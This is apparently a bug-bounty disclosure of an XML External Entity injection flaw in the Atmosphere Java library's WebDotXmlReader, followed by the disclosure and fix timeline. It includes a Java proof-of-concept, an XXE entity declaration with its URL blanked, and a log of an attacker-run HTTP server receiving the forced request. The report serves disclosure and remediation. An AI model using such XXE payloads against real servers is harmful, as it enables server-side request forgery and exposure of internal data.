Improper Restriction of XML External Entity Reference in atmosphere/atmosphere


Reported on

Oct 7th 2021


Atmosphere is vulnerable to SSRF (Server Side Request Forgery) via XML External Entity (XXE) injection. An attacker who can supply a crafted XML file as input to the WebDotXmlReader() constructor in the "" file can make the underlying parser resolve XML External Entities (XXE), causing the server to fetch attacker-chosen URLs.

Proof of Concept


import java.io.FileInputStream;
import java.io.InputStream;

import org.atmosphere.util.WebDotXmlReader;

public class Poc {

    public static void main(String[] args) {
        try {
            // Crafted XML file carrying the external entity declaration
            InputStream inputStream = new FileInputStream("C:\\Users\\[user]\\eclipse-workspace\\xxe_poc\\src\\main\\resources\\sample_ssrf.xml");
            // Constructing the reader parses the file and resolves the entity
            WebDotXmlReader wxmlreader = new WebDotXmlReader(inputStream);
        } catch (Exception e) {
            e.printStackTrace();
        }
    }
}

<?xml version="1.0"?>
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "">]>


└─# python3 -m http.server 8800
Serving HTTP on port 8800 ( ... - - [07/Oct/2021 16:39:07] "GET /text.txt HTTP/1.1" 200 -
We created a GitHub Issue asking the maintainers to create a a year ago
We have contacted a member of the atmosphere team and are waiting to hear back a year ago
atmosphere/atmosphere maintainer validated this vulnerability a year ago
Srikanth Prathi has been awarded the disclosure bounty
The fix bounty is now up for grabs
atmosphere/atmosphere maintainer confirmed that a fix has been merged on efb38e a year ago
The fix bounty has been dropped